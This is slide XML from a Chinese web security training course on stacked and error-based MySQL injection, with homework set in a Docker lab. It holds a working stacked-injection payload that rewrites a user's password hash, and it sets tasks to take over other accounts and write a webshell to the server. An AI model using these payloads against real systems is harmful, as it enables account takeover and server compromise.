              <a:t>/?id=1'; update users set password=e10adc3949ba59abbe56e057f20f883e' where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>; -- &amp;Submit=Submit#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" dirty="0"/>
              <a:t>成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>登录之后再进行复原。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20717510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54C6A-2360-E048-97AF-936385A0C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3414" y="306601"/>
            <a:ext cx="7852933" cy="557723"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="x-none" sz="32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课后作业</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="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3BD0F8A-7223-6D4F-BDE2-67DD467D28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0" t="756" r="42434" b="17660"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="481945" y="1117682"/>
            <a:ext cx="2786187" cy="5766697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62718D3-CDB0-ED43-920B-FCCA38F85DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481946" y="1117682"/>
            <a:ext cx="2786186" cy="579105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BE843B4-CE0B-5044-951B-F95D60E3C292}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346480" y="2841544"/>
            <a:ext cx="3100612" cy="21641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6990F6B-0A9F-F143-99A8-8BF0649910C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349808" y="3726425"/>
            <a:ext cx="3100612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200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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LET’S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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PRACTICE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solid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4F5D6C5-B877-8C42-9661-2954312D2E1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1122363"/>
            <a:ext cx="12192000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line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E8D7C7D-874B-3E46-BF54-19B86075F06E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4944878" y="2841544"/>
            <a:ext cx="6740304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这节课我们学习了堆叠注入的利用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="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  <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="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  <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="20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课后作业：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="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  <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="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  <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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Docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="20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里还有几个账户，请同学们自己尝试堆叠注入，目标是登录其他几个账户。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="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  <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="20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（进阶）探索更高级的堆叠注入利用方式，比如写一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1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webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="20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到服务器。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="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sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Freeform 1669">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{789BDFC4-93AC-5B46-AFDD-EF4D65AD18AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4132870" y="2835395"/>
            <a:ext cx="406648" cy="406648"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 519 w 719"/>
              <a:gd name="T1" fmla="*/ 263 h 719"/>
              <a:gd name="T2" fmla="*/ 292 w 719"/>
              <a:gd name="T3" fmla="*/ 475 h 719"/>
              <a:gd name="T4" fmla="*/ 289 w 719"/>
              <a:gd name="T5" fmla="*/ 477 h 719"/>
              <a:gd name="T6" fmla="*/ 284 w 719"/>
              <a:gd name="T7" fmla="*/ 479 h 719"/>
              <a:gd name="T8" fmla="*/ 280 w 719"/>
              <a:gd name="T9" fmla="*/ 477 h 719"/>
              <a:gd name="T10" fmla="*/ 275 w 719"/>
              <a:gd name="T11" fmla="*/ 475 h 719"/>
              <a:gd name="T12" fmla="*/ 200 w 719"/>
              <a:gd name="T13" fmla="*/ 400 h 719"/>
              <a:gd name="T14" fmla="*/ 198 w 719"/>
              <a:gd name="T15" fmla="*/ 396 h 719"/>
              <a:gd name="T16" fmla="*/ 197 w 719"/>
              <a:gd name="T17" fmla="*/ 391 h 719"/>
              <a:gd name="T18" fmla="*/ 198 w 719"/>
              <a:gd name="T19" fmla="*/ 387 h 719"/>
              <a:gd name="T20" fmla="*/ 200 w 719"/>
              <a:gd name="T21" fmla="*/ 382 h 719"/>
              <a:gd name="T22" fmla="*/ 205 w 719"/>
              <a:gd name="T23" fmla="*/ 380 h 719"/>
              <a:gd name="T24" fmla="*/ 209 w 719"/>
              <a:gd name="T25" fmla="*/ 379 h 719"/>
              <a:gd name="T26" fmla="*/ 213 w 719"/>
              <a:gd name="T27" fmla="*/ 380 h 719"/>
              <a:gd name="T28" fmla="*/ 217 w 719"/>
              <a:gd name="T29" fmla="*/ 382 h 719"/>
              <a:gd name="T30" fmla="*/ 284 w 719"/>
              <a:gd name="T31" fmla="*/ 450 h 719"/>
              <a:gd name="T32" fmla="*/ 503 w 719"/>
              <a:gd name="T33" fmla="*/ 247 h 719"/>
              <a:gd name="T34" fmla="*/ 507 w 719"/>
              <a:gd name="T35" fmla="*/ 243 h 719"/>
              <a:gd name="T36" fmla="*/ 512 w 719"/>
              <a:gd name="T37" fmla="*/ 243 h 719"/>
              <a:gd name="T38" fmla="*/ 516 w 719"/>
              <a:gd name="T39" fmla="*/ 243 h 719"/>
              <a:gd name="T40" fmla="*/ 519 w 719"/>
              <a:gd name="T41" fmla="*/ 247 h 719"/>
              <a:gd name="T42" fmla="*/ 522 w 719"/>
              <a:gd name="T43" fmla="*/ 251 h 719"/>
              <a:gd name="T44" fmla="*/ 523 w 719"/>
              <a:gd name="T45" fmla="*/ 255 h 719"/>
              <a:gd name="T46" fmla="*/ 522 w 719"/>
              <a:gd name="T47" fmla="*/ 260 h 719"/>
              <a:gd name="T48" fmla="*/ 519 w 719"/>
              <a:gd name="T49" fmla="*/ 263 h 719"/>
              <a:gd name="T50" fmla="*/ 707 w 719"/>
              <a:gd name="T51" fmla="*/ 0 h 719"/>
              <a:gd name="T52" fmla="*/ 12 w 719"/>
              <a:gd name="T53" fmla="*/ 0 h 719"/>
              <a:gd name="T54" fmla="*/ 8 w 719"/>
              <a:gd name="T55" fmla="*/ 2 h 719"/>
              <a:gd name="T56" fmla="*/ 4 w 719"/>
              <a:gd name="T57" fmla="*/ 5 h 719"/>
              <a:gd name="T58" fmla="*/ 1 w 719"/>
              <a:gd name="T59" fmla="*/ 8 h 719"/>
              <a:gd name="T60" fmla="*/ 0 w 719"/>
              <a:gd name="T61" fmla="*/ 13 h 719"/>
              <a:gd name="T62" fmla="*/ 0 w 719"/>
              <a:gd name="T63" fmla="*/ 707 h 719"/>
              <a:gd name="T64" fmla="*/ 1 w 719"/>
              <a:gd name="T65" fmla="*/ 713 h 719"/>
              <a:gd name="T66" fmla="*/ 4 w 719"/>
              <a:gd name="T67" fmla="*/ 716 h 719"/>
              <a:gd name="T68" fmla="*/ 8 w 719"/>
              <a:gd name="T69" fmla="*/ 719 h 719"/>
              <a:gd name="T70" fmla="*/ 12 w 719"/>
              <a:gd name="T71" fmla="*/ 719 h 719"/>
              <a:gd name="T72" fmla="*/ 707 w 719"/>
              <a:gd name="T73" fmla="*/ 719 h 719"/>
              <a:gd name="T74" fmla="*/ 711 w 719"/>
              <a:gd name="T75" fmla="*/ 719 h 719"/>
              <a:gd name="T76" fmla="*/ 716 w 719"/>
              <a:gd name="T77" fmla="*/ 716 h 719"/>
              <a:gd name="T78" fmla="*/ 718 w 719"/>
              <a:gd name="T79" fmla="*/ 713 h 719"/>
              <a:gd name="T80" fmla="*/ 719 w 719"/>
              <a:gd name="T81" fmla="*/ 707 h 719"/>
              <a:gd name="T82" fmla="*/ 719 w 719"/>
              <a:gd name="T83" fmla="*/ 13 h 719"/>
              <a:gd name="T84" fmla="*/ 718 w 719"/>
              <a:gd name="T85" fmla="*/ 8 h 719"/>
              <a:gd name="T86" fmla="*/ 716 w 719"/>
              <a:gd name="T87" fmla="*/ 5 h 719"/>
              <a:gd name="T88" fmla="*/ 711 w 719"/>
              <a:gd name="T89" fmla="*/ 2 h 719"/>
              <a:gd name="T90" fmla="*/ 707 w 719"/>
              <a:gd name="T91" fmla="*/ 0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19" h="719">
                <a:moveTo>
                  <a:pt x="519" y="263"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="292" y="475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289" y="477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280" y="477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="275" y="475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="198" y="396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197" y="391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="198" y="387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205" y="380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209" y="379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213" y="380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217" y="382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503" y="247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507" y="243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512" y="243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516" y="243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="519" y="247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="523" y="255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522" y="260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="519" y="263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4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4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3792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4CD337-3BE7-0A4A-98DE-7AA8618CD6A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048397" y="4476784"/>
            <a:ext cx="6095206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2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>扫码试看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>订阅</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>《Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t> 安全攻防实战</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>》</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>视频课程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BB5B18B-4632-5B46-8087-CF3F8F6B5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421" y="1473626"/>
            <a:ext cx="3003158" cy="300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59741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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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原理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E14782-4650-2440-AC41-0CF73AC29A3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900956" y="1599269"/>
            <a:ext cx="4945203" cy="355624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报错注入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>Error based Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" dirty="0"/>
              <a:t>）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73694E-6419-C940-91E6-3FBB1F0D9C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13748" y="2305200"/>
            <a:ext cx="8099801" cy="3901383"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 的报错注入主要是利用 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 的一些逻辑漏洞，如 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>BigInt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 大数溢出等，由此可以将 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 报错注入主要分为以下几类：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/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AutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>BigInt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 等数据类型溢出；</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/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AutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 语法错误；</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/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AutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>count()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rand()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group_by</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 导致重复；</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/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AutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>空间数据类型函数错误。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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29" y="1510393"/>
            <a:ext cx="4445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62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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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常见函数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E14782-4650-2440-AC41-0CF73AC29A3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900956" y="1599269"/>
            <a:ext cx="4945203" cy="355624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报错注入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>Error based Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" dirty="0"/>
              <a:t>）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73694E-6419-C940-91E6-3FBB1F0D9C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13748" y="2305200"/>
            <a:ext cx="8099801" cy="3901383"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>很多函数会导致 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 报错并显示出数据：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/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AutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>floor</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 函数；</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/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AutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 函数；（最多</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/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AutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 函数；</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/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AutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>exp()</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 函数；</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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29" y="1510393"/>
            <a:ext cx="4445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596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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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预备函数 </a:t>
            </a:r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kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>rand([N])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E14782-4650-2440-AC41-0CF73AC29A3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900956" y="1599269"/>
            <a:ext cx="9855615" cy="355624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CN" dirty="0"/>
              <a:t>rand([N]) - </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>返回一个随机浮点数 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，范围是 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0&lt;=v&lt;1.0</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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29" y="1510393"/>
            <a:ext cx="444500" cy="44450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69E83C2C-0B99-FC45-A393-331CCC6579A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="581149" y="2718865"/>
            <a:ext cx="11029702" cy="2743200"/>
            <a:chOff x="854281" y="2718865"/>
            <a:chExt cx="11029702" cy="2743200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="图片 8" descr="手机屏幕的截图&#10;&#10;描述已自动生成">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6BA3C2D-8896-7D48-B222-BAC1C9D26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4281" y="2718865"/>
              <a:ext cx="5448300" cy="2743200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="图片 10" descr="手机屏幕截图&#10;&#10;描述已自动生成">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B8193E8-1C00-B145-900B-6D3E9944C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35683" y="2718865"/>
              <a:ext cx="5448300" cy="2743200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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212BFCAF-184C-F044-A73F-E5B2D25C772F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
